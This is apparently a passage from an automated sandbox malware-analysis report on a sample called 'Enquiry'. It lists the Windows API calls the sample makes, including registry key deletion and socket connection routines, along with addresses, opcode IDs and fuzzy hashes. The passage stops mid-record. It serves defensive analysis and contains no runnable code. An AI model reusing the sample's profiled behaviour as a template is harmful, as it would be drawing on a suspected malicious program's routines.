                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String
                            • String ID:
                            • API String ID: 2832842796-0
                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Enum$CloseDeleteOpen
                            • String ID:
                            • API String ID: 2095303065-0
                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00436A24
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: RectWindow
                            • String ID:
                            • API String ID: 861336768-0
                            • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                            • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                            • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                            • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                            APIs
                            • SendMessageW.USER32 ref: 00449598
                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                            • _wcslen.LIBCMT ref: 0044960D
                            • _wcslen.LIBCMT ref: 0044961A
                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$_wcslen$_wcspbrk
                            • String ID:
                            • API String ID: 1856069659-0
                            • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                            • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                            • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                            • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                            APIs
                            • GetCursorPos.USER32(?), ref: 004478E2
                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                            • GetCursorPos.USER32(00000000), ref: 0044796A
                            • TrackPopupMenuEx.USER32(03236340,00000000,00000000,?,?,00000000), ref: 00447991
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CursorMenuPopupTrack$Proc
                            • String ID:
                            • API String ID: 1300944170-0
                            • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                            • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                            • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                            • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                            APIs
                            • GetClientRect.USER32(?,?), ref: 004479CC
                            • GetCursorPos.USER32(?), ref: 004479D7
                            • ScreenToClient.USER32(?,?), ref: 004479F3
                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Client$CursorFromPointProcRectScreenWindow
                            • String ID:
                            • API String ID: 1822080540-0
                            • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                            • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                            • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                            • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                            • EndPaint.USER32(?,?), ref: 00447D13
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                            • String ID:
                            • API String ID: 659298297-0
                            • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                            • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                            • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                            • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                            APIs
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                              • Part of subcall function 00440D98: SendMessageW.USER32(03231AA0,000000F1,00000000,00000000), ref: 00440E6E
                              • Part of subcall function 00440D98: SendMessageW.USER32(03231AA0,000000F1,00000001,00000000), ref: 00440E9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$EnableMessageSend$LongShow
                            • String ID:
                            • API String ID: 142311417-0
                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                            APIs
                            • IsWindowVisible.USER32(?), ref: 00445879
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                            • _wcslen.LIBCMT ref: 004458FB
                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                            • String ID:
                            • API String ID: 3087257052-0
                            • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                            • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                            APIs
                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                            • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                            • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 245547762-0
                            • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                            • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                            • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                            • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 004471D8
                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                            • SelectObject.GDI32(?,00000000), ref: 00447228
                            • BeginPath.GDI32(?), ref: 0044723D
                            • SelectObject.GDI32(?,00000000), ref: 00447266
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Object$Select$BeginCreateDeletePath
                            • String ID:
                            • API String ID: 2338827641-0
                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00434598
                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                            • Sleep.KERNEL32(00000000), ref: 004345D4
                            • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID:
                            • API String ID: 2875609808-0
                            • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                            • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                            • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                            • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                            • MessageBeep.USER32(00000000), ref: 00460C46
                            • KillTimer.USER32(?,0000040A), ref: 00460C68
                            • EndDialog.USER32(?,00000001), ref: 00460C83
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                            • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                            • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                            • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$Icon
                            • String ID:
                            • API String ID: 4023252218-0
                            • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                            • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                            • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                            • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                            APIs
                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                            • String ID:
                            • API String ID: 1489400265-0
                            • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                            APIs
                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                            • DestroyWindow.USER32(?), ref: 00455728
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
